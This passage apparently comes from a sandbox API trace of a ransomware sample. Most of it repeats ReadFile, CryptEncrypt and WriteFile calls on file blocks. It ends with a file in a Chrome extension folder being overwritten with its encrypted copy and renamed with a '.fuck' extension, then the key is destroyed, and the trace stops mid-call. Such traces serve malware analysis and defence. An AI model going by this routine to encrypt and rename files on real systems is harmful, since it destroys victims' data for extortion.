hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.150] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.150] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.150] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.151] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.151] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.151] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.151] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.151] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.151] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.151] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.151] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.151] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.151] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.151] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.151] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.152] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.152] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.152] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.152] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.152] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.152] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.152] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.153] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.153] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.153] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.153] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.153] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.153] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.153] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.153] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.153] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.153] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.153] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.153] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.153] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.153] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.154] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.154] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.154] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.154] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.154] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.154] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.154] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.154] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.154] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.154] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.154] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.154] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.154] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.154] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.154] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.154] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.154] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.155] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.155] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.155] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.155] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.155] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.155] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.155] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.155] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.155] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.155] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.155] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.155] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.155] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.155] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.155] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.155] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.155] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.156] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.156] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.156] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.156] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.156] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.156] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.156] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.156] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.156] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.156] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.156] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.156] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.156] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.156] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.156] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.156] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.156] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.156] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.157] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.157] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.157] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.157] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.157] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.172] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js"), bFailIfExists=0) returned 1 [0261.188] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js", dwFileAttributes=0x0) returned 1 [0261.189] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.gsg")) returned 1 [0261.193] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.fuck")) returned 1 [0261.195] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0261.195] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0261.195] CryptReleaseContext (hProv=0x2e7a500, 